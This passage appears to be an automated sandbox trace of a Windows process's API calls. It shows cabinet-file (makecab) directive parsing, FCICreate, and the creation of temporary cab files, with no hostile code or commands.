(_Str1="MaxDiskSize", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi (_Str1="MaxErrors", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="InfDiskLineFormat1") returned 9 [0255.774] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="InfDiskLineFormat1") returned 9 [0255.774] _strcmpi (_Str1="ReservePerFolderSize", _Str2="InfDiskLineFormat1") returned 9 [0255.774] _strcmpi (_Str1="RptFileName", _Str2="InfDiskLineFormat1") returned 9 [0255.774] _strcmpi (_Str1="SourceDir", _Str2="InfDiskLineFormat1") returned 10 [0255.775] _strcmpi (_Str1="UniqueFiles", _Str2="InfDiskLineFormat1") returned 12 [0255.775] _strcmpi (_Str1="DiskDirectory1", _Str2="InfDiskLineFormat1") returned -5 [0255.775] _strcmpi (_Str1="CabinetName1", _Str2="InfDiskLineFormat1") returned -6 [0255.775] atoi (_Str="1") returned 1 [0255.775] _vsnprintf (in: _DstBuf=0x27e87fad40, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87faca8 | out: _DstBuf="InfDiskLineFormat1") returned 18 [0255.775] atoi (_Str="1") returned 1 [0255.775] _strcmpi (_Str1="Cabinet", _Str2="InfDiskLineFormat") returned -6 [0255.775] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfDiskLineFormat") returned -6 [0255.775] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfDiskLineFormat") returned -6 [0255.775] _strcmpi (_Str1="ChecksumWidth", _Str2="InfDiskLineFormat") returned -6 [0255.775] _strcmpi (_Str1="ClusterSize", _Str2="InfDiskLineFormat") returned -6 [0255.775] _strcmpi (_Str1="Compress", _Str2="InfDiskLineFormat") returned -6 [0255.775] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfDiskLineFormat") returned 3 [0255.775] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfDiskLineFormat") returned -6 [0255.775] _strcmpi (_Str1="CompressionType", _Str2="InfDiskLineFormat") returned -6 [0255.775] _strcmpi (_Str1="CompressionLevel", _Str2="InfDiskLineFormat") returned -6 [0255.775] _strcmpi (_Str1="CompressionMemory", _Str2="InfDiskLineFormat") returned -6 [0255.775] _strcmpi (_Str1="DestinationDir", _Str2="InfDiskLineFormat") returned -5 [0255.775] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfDiskLineFormat") returned -5 [0255.775] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfDiskLineFormat") returned -5 [0255.775] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfDiskLineFormat") returned -5 [0255.775] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfDiskLineFormat") returned -3 [0255.775] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfDiskLineFormat") returned -3 [0255.775] _strcmpi (_Str1="GenerateInf", _Str2="InfDiskLineFormat") returned -2 [0255.775] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfDiskLineFormat") returned -1 [0255.775] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfDiskLineFormat") returned -1 [0255.775] _strcmpi (_Str1="InfCommentString", _Str2="InfDiskLineFormat") returned -1 [0255.775] _strcmpi (_Str1="InfDateFormat", _Str2="InfDiskLineFormat") returned -8 [0255.775] _strcmpi (_Str1="InfDiskHeader", _Str2="InfDiskLineFormat") returned -4 [0255.775] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfDiskLineFormat") returned 0 [0255.776] _strcmpi (_Str1="Cabinet", _Str2="Infdisk#") returned -6 [0255.776] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Infdisk#") returned -6 [0255.776] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Infdisk#") returned -6 [0255.776] _strcmpi (_Str1="ChecksumWidth", _Str2="Infdisk#") returned -6 [0255.776] _strcmpi (_Str1="ClusterSize", _Str2="Infdisk#") returned -6 [0255.776] _strcmpi (_Str1="Compress", _Str2="Infdisk#") returned -6 [0255.776] _strcmpi (_Str1="LongSourceFileNames", _Str2="Infdisk#") returned 3 [0255.776] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="Infdisk#") returned -6 [0255.776] _strcmpi (_Str1="CompressionType", _Str2="Infdisk#") returned -6 [0255.776] _strcmpi (_Str1="CompressionLevel", _Str2="Infdisk#") returned -6 [0255.776] _strcmpi (_Str1="CompressionMemory", _Str2="Infdisk#") returned -6 [0255.776] _strcmpi (_Str1="DestinationDir", _Str2="Infdisk#") returned -5 [0255.776] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="Infdisk#") returned -5 [0255.776] _strcmpi (_Str1="DiskLabelTemplate", _Str2="Infdisk#") returned -5 [0255.776] _strcmpi (_Str1="DoNotCopyFiles", _Str2="Infdisk#") returned -5 [0255.776] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="Infdisk#") returned -3 [0255.776] _strcmpi (_Str1="FolderSizeThreshold", _Str2="Infdisk#") returned -3 [0255.776] _strcmpi (_Str1="GenerateInf", _Str2="Infdisk#") returned -2 [0255.776] _strcmpi (_Str1="InfCabinetHeader", _Str2="Infdisk#") returned -1 [0255.776] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="Infdisk#") returned -1 [0255.776] _strcmpi (_Str1="InfCommentString", _Str2="Infdisk#") returned -1 [0255.776] _strcmpi (_Str1="InfDateFormat", _Str2="Infdisk#") returned -8 [0255.776] _strcmpi (_Str1="InfDiskHeader", _Str2="Infdisk#") returned 69 [0255.776] _strcmpi (_Str1="InfDiskLineFormat", _Str2="Infdisk#") returned 73 [0255.776] _strcmpi (_Str1="InfFileHeader", _Str2="Infdisk#") returned 2 [0255.776] _strcmpi (_Str1="InfFileLineFormat", _Str2="Infdisk#") returned 2 [0255.776] _strcmpi (_Str1="InfFileName", _Str2="Infdisk#") returned 2 [0255.776] _strcmpi (_Str1="InfFooter", _Str2="Infdisk#") returned 2 [0255.777] _strcmpi (_Str1="InfFooter1", _Str2="Infdisk#") returned 2 [0255.777] _strcmpi (_Str1="InfFooter2", _Str2="Infdisk#") returned 2 [0255.777] _strcmpi (_Str1="InfFooter3", _Str2="Infdisk#") returned 2 [0255.777] _strcmpi (_Str1="InfFooter4", _Str2="Infdisk#") returned 2 [0255.777] _strcmpi (_Str1="InfHeader", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="InfHeader1", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="InfHeader2", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="InfHeader3", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="InfHeader4", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="InfHeader5", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="InfHeader6", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="InfSectionOrder", _Str2="Infdisk#") returned 15 [0255.777] _strcmpi (_Str1="MaxCabinetSize", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="MaxDiskFileCount", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="MaxDiskSize", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="MaxErrors", _Str2="Infdisk#") returned 4 [0255.777] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="Infdisk#") returned 9 [0255.777] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="Infdisk#") returned 9 [0255.777] _strcmpi (_Str1="ReservePerFolderSize", _Str2="Infdisk#") returned 9 [0255.777] _strcmpi (_Str1="RptFileName", _Str2="Infdisk#") returned 9 [0255.777] _strcmpi (_Str1="SourceDir", _Str2="Infdisk#") returned 10 [0255.777] _strcmpi (_Str1="UniqueFiles", _Str2="Infdisk#") returned 12 [0255.820] _strcmpi (_Str1="DiskDirectory1", _Str2="Infdisk#") returned -5 [0255.820] _strcmpi (_Str1="CabinetName1", _Str2="Infdisk#") returned -6 [0255.821] atoi (_Str="1") returned 1 [0255.821] _vsnprintf (in: _DstBuf=0x27e87fabc0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fab28 | out: _DstBuf="Infdisk#") returned 8 [0255.821] atoi (_Str="1") returned 1 [0255.821] _strcmpi (_Str1="disk#", _Str2="disk#") returned 0 [0255.821] _vsnprintf (in: _DstBuf=0x27e8c1af68, _MaxCount=0x1ff, _Format="%d", _ArgList=0x27e87fb148 | out: _DstBuf="1") returned 1 [0255.821] _strcmpi (_Str1="Cabinet", _Str2="Inflabel") returned -6 [0255.821] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Inflabel") returned -6 [0255.821] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Inflabel") returned -6 [0255.821] _strcmpi (_Str1="ChecksumWidth", _Str2="Inflabel") returned -6 [0255.821] _strcmpi (_Str1="ClusterSize", _Str2="Inflabel") returned -6 [0255.821] _strcmpi (_Str1="Compress", _Str2="Inflabel") returned -6 [0255.821] _strcmpi (_Str1="LongSourceFileNames", _Str2="Inflabel") returned 3 [0255.821] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="Inflabel") returned -6 [0255.821] _strcmpi (_Str1="CompressionType", _Str2="Inflabel") returned -6 [0255.821] _strcmpi (_Str1="CompressionLevel", _Str2="Inflabel") returned -6 [0255.821] _strcmpi (_Str1="CompressionMemory", _Str2="Inflabel") returned -6 [0255.821] _strcmpi (_Str1="DestinationDir", _Str2="Inflabel") returned -5 [0255.821] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="Inflabel") returned -5 [0255.821] _strcmpi (_Str1="DiskLabelTemplate", _Str2="Inflabel") returned -5 [0255.821] _strcmpi (_Str1="DoNotCopyFiles", _Str2="Inflabel") returned -5 [0255.821] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="Inflabel") returned -3 [0255.821] _strcmpi (_Str1="FolderSizeThreshold", _Str2="Inflabel") returned -3 [0255.821] _strcmpi (_Str1="GenerateInf", _Str2="Inflabel") returned -2 [0255.821] _strcmpi (_Str1="InfCabinetHeader", _Str2="Inflabel") returned -9 [0255.821] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="Inflabel") returned -9 [0255.821] _strcmpi (_Str1="InfCommentString", _Str2="Inflabel") returned -9 [0255.821] _strcmpi (_Str1="InfDateFormat", _Str2="Inflabel") returned -8 [0255.822] _strcmpi (_Str1="InfDiskHeader", _Str2="Inflabel") returned -8 [0255.822] _strcmpi (_Str1="InfDiskLineFormat", _Str2="Inflabel") returned -8 [0255.822] _strcmpi (_Str1="InfFileHeader", _Str2="Inflabel") returned -6 [0255.822] _strcmpi (_Str1="InfFileLineFormat", _Str2="Inflabel") returned -6 [0255.822] _strcmpi (_Str1="InfFileName", _Str2="Inflabel") returned -6 [0255.822] _strcmpi (_Str1="InfFooter", _Str2="Inflabel") returned -6 [0255.822] _strcmpi (_Str1="InfFooter1", _Str2="Inflabel") returned -6 [0255.822] _strcmpi (_Str1="InfFooter2", _Str2="Inflabel") returned -6 [0255.822] _strcmpi (_Str1="InfFooter3", _Str2="Inflabel") returned -6 [0255.822] _strcmpi (_Str1="InfFooter4", _Str2="Inflabel") returned -6 [0255.822] _strcmpi (_Str1="InfHeader", _Str2="Inflabel") returned -4 [0255.822] _strcmpi (_Str1="InfHeader1", _Str2="Inflabel") returned -4 [0255.822] _strcmpi (_Str1="InfHeader2", _Str2="Inflabel") returned -4 [0255.822] _strcmpi (_Str1="InfHeader3", _Str2="Inflabel") returned -4 [0255.822] _strcmpi (_Str1="InfHeader4", _Str2="Inflabel") returned -4 [0255.822] _strcmpi (_Str1="InfHeader5", _Str2="Inflabel") returned -4 [0255.822] _strcmpi (_Str1="InfHeader6", _Str2="Inflabel") returned -4 [0255.822] _strcmpi (_Str1="InfSectionOrder", _Str2="Inflabel") returned 7 [0255.822] _strcmpi (_Str1="MaxCabinetSize", _Str2="Inflabel") returned 4 [0255.822] _strcmpi (_Str1="MaxDiskFileCount", _Str2="Inflabel") returned 4 [0255.822] _strcmpi (_Str1="MaxDiskSize", _Str2="Inflabel") returned 4 [0255.822] _strcmpi (_Str1="MaxErrors", _Str2="Inflabel") returned 4 [0255.822] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="Inflabel") returned 9 [0255.822] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="Inflabel") returned 9 [0255.822] _strcmpi (_Str1="ReservePerFolderSize", _Str2="Inflabel") returned 9 [0255.822] _strcmpi (_Str1="RptFileName", _Str2="Inflabel") returned 9 [0255.822] _strcmpi (_Str1="SourceDir", _Str2="Inflabel") returned 10 [0255.822] _strcmpi (_Str1="UniqueFiles", _Str2="Inflabel") returned 12 [0255.822] _strcmpi (_Str1="DiskDirectory1", _Str2="Inflabel") returned -5 [0255.822] _strcmpi (_Str1="CabinetName1", _Str2="Inflabel") returned -6 [0255.822] atoi (_Str="1") returned 1 [0255.822] _vsnprintf (in: _DstBuf=0x27e87fabc0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fab28 | out: _DstBuf="Inflabel") returned 8 [0255.823] atoi (_Str="1") returned 1 [0255.823] _strcmpi (_Str1="disk#", _Str2="label") returned -8 [0255.823] _strcmpi (_Str1="label", _Str2="label") returned 0 [0255.823] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\n" | out: _File=0x7ff97744e2a0) returned 9 [0255.823] _vsnprintf (in: _DstBuf=0x27e8c1574c, _MaxCount=0x7ff, _Format="CabinetName%d", _ArgList=0x27e87fb258 | out: _DstBuf="CabinetName1") returned 12 [0255.823] _strcmpi (_Str1="Cabinet", _Str2="CabinetName1") returned -110 [0255.823] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CabinetName1") returned -8 [0255.823] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CabinetName1") returned 67 [0255.823] atol (_Str="0") returned 0 [0255.823] atol (_Str="0") returned 0 [0255.823] _vsnprintf (in: _DstBuf=0x27e87fb320, _MaxCount=0x1f, _Format="InfCabinetLineFormat%d", _ArgList=0x27e87faf68 | out: _DstBuf="InfCabinetLineFormat1") returned 21 [0255.823] atoi (_Str="1") returned 1 [0255.823] _vsnprintf (in: _DstBuf=0x27e87fadc0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fad28 | out: _DstBuf="InfCabinetLineFormat1") returned 21 [0255.823] atoi (_Str="1") returned 1 [0255.823] atoi (_Str="1") returned 1 [0255.823] _vsnprintf (in: _DstBuf=0x27e87fac40, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87faba8 | out: _DstBuf="Infcab#") returned 7 [0255.823] atoi (_Str="1") returned 1 [0255.823] _vsnprintf (in: _DstBuf=0x27e8c1af68, _MaxCount=0x1ff, _Format="%d", _ArgList=0x27e87fb1c8 | out: _DstBuf="1") returned 1 [0255.823] atoi (_Str="1") returned 1 [0255.824] _vsnprintf (in: _DstBuf=0x27e87fac40, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87faba8 | out: _DstBuf="Infdisk#") returned 8 [0255.824] atoi (_Str="1") returned 1 [0255.824] _vsnprintf (in: _DstBuf=0x27e8c1af6a, _MaxCount=0x1fd, _Format="%d", _ArgList=0x27e87fb1c8 | out: _DstBuf="1") returned 1 [0255.824] atoi (_Str="1") returned 1 [0255.824] _vsnprintf (in: _DstBuf=0x27e87fac40, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87faba8 | out: _DstBuf="Infcabfile") returned 10 [0255.824] atoi (_Str="1") returned 1 [0255.824] fprintf (in: _File=0x7ff97744e2d0, _Format="%s\n" | out: _File=0x7ff97744e2d0) returned 13 [0255.824] atol (_Str="0") returned 0 [0255.824] _strcmpi (_Str1="Cabinet", _Str2="ReservePerFolderSize") returned -15 [0255.824] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="ReservePerFolderSize") returned -15 [0255.824] _strcmpi (_Str1="CabinetNameTemplate", _Str2="ReservePerFolderSize") returned -15 [0255.824] _strcmpi (_Str1="ChecksumWidth", _Str2="ReservePerFolderSize") returned -15 [0255.824] _strcmpi (_Str1="ClusterSize", _Str2="ReservePerFolderSize") returned -15 [0255.824] _strcmpi (_Str1="Compress", _Str2="ReservePerFolderSize") returned -15 [0255.824] _strcmpi (_Str1="LongSourceFileNames", _Str2="ReservePerFolderSize") returned -6 [0255.824] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="ReservePerFolderSize") returned -15 [0255.824] _strcmpi (_Str1="CompressionType", _Str2="ReservePerFolderSize") returned -15 [0255.824] _strcmpi (_Str1="CompressionLevel", _Str2="ReservePerFolderSize") returned -15 [0255.825] _strcmpi (_Str1="CompressionMemory", _Str2="ReservePerFolderSize") returned -15 [0255.825] _strcmpi (_Str1="DestinationDir", _Str2="ReservePerFolderSize") returned -14 [0255.825] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="ReservePerFolderSize") returned -14 [0255.825] _strcmpi (_Str1="DiskLabelTemplate", _Str2="ReservePerFolderSize") returned -14 [0255.825] _strcmpi (_Str1="DoNotCopyFiles", _Str2="ReservePerFolderSize") returned -14 [0255.825] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="ReservePerFolderSize") returned -12 [0255.825] _strcmpi (_Str1="FolderSizeThreshold", _Str2="ReservePerFolderSize") returned -12 [0255.825] _strcmpi (_Str1="GenerateInf", _Str2="ReservePerFolderSize") returned -11 [0255.825] _strcmpi (_Str1="InfCabinetHeader", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfCommentString", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfDateFormat", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfDiskHeader", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfDiskLineFormat", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfFileHeader", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfFileLineFormat", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfFileName", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfFooter", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfFooter1", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfFooter2", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfFooter3", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfFooter4", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfHeader", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfHeader1", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfHeader2", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfHeader3", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfHeader4", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfHeader5", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfHeader6", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="InfSectionOrder", _Str2="ReservePerFolderSize") returned -9 [0255.825] _strcmpi (_Str1="MaxCabinetSize", _Str2="ReservePerFolderSize") returned -5 [0255.825] _strcmpi (_Str1="MaxDiskFileCount", _Str2="ReservePerFolderSize") returned -5 [0255.825] _strcmpi (_Str1="MaxDiskSize", _Str2="ReservePerFolderSize") returned -5 [0255.825] _strcmpi (_Str1="MaxErrors", _Str2="ReservePerFolderSize") returned -5 [0255.825] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="ReservePerFolderSize") returned -3 [0255.825] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="ReservePerFolderSize") returned -2 [0255.826] _strcmpi (_Str1="ReservePerFolderSize", _Str2="ReservePerFolderSize") returned 0 [0255.826] atol (_Str="0") returned 0 [0255.826] _strcmpi (_Str1="Cabinet", _Str2="ReservePerDataBlockSize") returned -15 [0255.826] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="ReservePerDataBlockSize") returned -15 [0255.826] _strcmpi (_Str1="CabinetNameTemplate", _Str2="ReservePerDataBlockSize") returned -15 [0255.826] _strcmpi (_Str1="ChecksumWidth", _Str2="ReservePerDataBlockSize") returned -15 [0255.826] _strcmpi (_Str1="ClusterSize", _Str2="ReservePerDataBlockSize") returned -15 [0255.826] _strcmpi (_Str1="Compress", _Str2="ReservePerDataBlockSize") returned -15 [0255.826] _strcmpi (_Str1="LongSourceFileNames", _Str2="ReservePerDataBlockSize") returned -6 [0255.826] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="ReservePerDataBlockSize") returned -15 [0255.826] _strcmpi (_Str1="CompressionType", _Str2="ReservePerDataBlockSize") returned -15 [0255.826] _strcmpi (_Str1="CompressionLevel", _Str2="ReservePerDataBlockSize") returned -15 [0255.826] _strcmpi (_Str1="CompressionMemory", _Str2="ReservePerDataBlockSize") returned -15 [0255.826] _strcmpi (_Str1="DestinationDir", _Str2="ReservePerDataBlockSize") returned -14 [0255.826] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="ReservePerDataBlockSize") returned -14 [0255.826] _strcmpi (_Str1="DiskLabelTemplate", _Str2="ReservePerDataBlockSize") returned -14 [0255.826] _strcmpi (_Str1="DoNotCopyFiles", _Str2="ReservePerDataBlockSize") returned -14 [0255.826] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="ReservePerDataBlockSize") returned -12 [0255.826] _strcmpi (_Str1="FolderSizeThreshold", _Str2="ReservePerDataBlockSize") returned -12 [0255.826] _strcmpi (_Str1="GenerateInf", _Str2="ReservePerDataBlockSize") returned -11 [0255.826] _strcmpi (_Str1="InfCabinetHeader", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfCommentString", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfDateFormat", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfDiskHeader", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfDiskLineFormat", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfFileHeader", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfFileLineFormat", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfFileName", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfFooter", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfFooter1", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfFooter2", _Str2="ReservePerDataBlockSize") returned -9 [0255.826] _strcmpi (_Str1="InfFooter3", _Str2="ReservePerDataBlockSize") returned -9 [0255.827] _strcmpi (_Str1="InfFooter4", _Str2="ReservePerDataBlockSize") returned -9 [0255.827] _strcmpi (_Str1="InfHeader", _Str2="ReservePerDataBlockSize") returned -9 [0255.827] _strcmpi (_Str1="InfHeader1", _Str2="ReservePerDataBlockSize") returned -9 [0255.827] _strcmpi (_Str1="InfHeader2", _Str2="ReservePerDataBlockSize") returned -9 [0255.827] _strcmpi (_Str1="InfHeader3", _Str2="ReservePerDataBlockSize") returned -9 [0255.827] _strcmpi (_Str1="InfHeader4", _Str2="ReservePerDataBlockSize") returned -9 [0255.827] _strcmpi (_Str1="InfHeader5", _Str2="ReservePerDataBlockSize") returned -9 [0255.827] _strcmpi (_Str1="InfHeader6", _Str2="ReservePerDataBlockSize") returned -9 [0255.827] _strcmpi (_Str1="InfSectionOrder", _Str2="ReservePerDataBlockSize") returned -9 [0255.827] _strcmpi (_Str1="MaxCabinetSize", _Str2="ReservePerDataBlockSize") returned -5 [0255.827] _strcmpi (_Str1="MaxDiskFileCount", _Str2="ReservePerDataBlockSize") returned -5 [0255.827] _strcmpi (_Str1="MaxDiskSize", _Str2="ReservePerDataBlockSize") returned -5 [0255.827] _strcmpi (_Str1="MaxErrors", _Str2="ReservePerDataBlockSize") returned -5 [0255.827] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="ReservePerDataBlockSize") returned -1 [0255.827] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="ReservePerDataBlockSize") returned 0 [0255.827] atol (_Str="0") returned 0 [0255.860] FCICreate () returned 0x27e8c1d740 [0255.860] GetCurrentProcessId () returned 0x200 [0255.860] _vsnprintf (in: _DstBuf=0x27e87fb293, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fb288 | out: _DstBuf="_512_") returned 5 [0255.860] _tempnam (_Directory="", _FilePrefix="cab_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_5" [0255.861] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_5" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab_512_5"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0255.862] GetLastError () returned 0x0 [0255.862] _open_osfhandle (_OSFileHandle=0x9c, _Flags=34178) returned 7 [0255.862] GetCurrentProcessId () returned 0x200 [0255.862] _vsnprintf (in: _DstBuf=0x27e87fb293, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fb288 | out: _DstBuf="_512_") returned 5 [0255.862] _tempnam (_Directory="", _FilePrefix="cab_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_6" [0255.862] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_6" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab_512_6"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0255.862] GetLastError () returned 0x0 [0255.863] _open_osfhandle (_OSFileHandle=0xa0, _Flags=34178) returned 8 [0255.863] GetCurrentProcessId () returned 0x200 [0255.863] _vsnprintf (in: _DstBuf=0x27e87fb293, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fb288 | out: _DstBuf="_512_") returned 5 [0255.863] _tempnam (_Directory="", _FilePrefix="cab_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_7" [0255.863] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_7" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab_512_7"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0255.863] GetLastError () returned 0x0 [0255.863] _open_osfhandle (_OSFileHandle=0xa4, _Flags=34178) returned 9 [0255.863] GetCurrentProcessId () returned 0x200 [0255.863] _vsnprintf (in: _DstBuf=0x27e87fb293, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fb288 | out: _DstBuf="_512_") returned 5 [0255.864] _tempnam (_Directory="", _FilePrefix="cab_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_8" [0255.864] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_8" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab_512_8"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0255.864] GetLastError () returned 0x0 [0255.864] _open_osfhandle (_OSFileHandle=0xa8, _Flags=34178) returned 10 [0255.864] GetCurrentProcessId () returned 0x200 [0255.864] _vsnprintf (in: _DstBuf=0x27e87fb293, _MaxCount=0xa, _Format="_%u_", _ArgList=0x27e87fb288 | out: _DstBuf="_512_") returned 5 [0255.864] _tempnam (_Directory="", _FilePrefix="cab_512_") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_9" [0255.864] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\cab_512_9" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab_512_9"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0255.865] GetLastError () returned 0x0 [0255.865] _open_osfhandle (_OSFileHandle=0xac, _Flags=34178) returned 11 [0255.865] _vsnprintf (in: _DstBuf=0x27e8c1574c, _MaxCount=0x7ff, _Format="MaxDiskSize%d", _ArgList=0x27e87fb648 | out: _DstBuf="MaxDiskSize1") returned 12 [0255.865] _strcmpi (_Str1="Cabinet", _Str2="MaxDiskSize1") returned -10 [0255.865] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="MaxDiskSize1") returned -10 [0255.865] _strcmpi (_Str1="CabinetNameTemplate", _Str2="MaxDiskSize1") returned -10 [0255.865] _strcmpi (_Str1="ChecksumWidth", 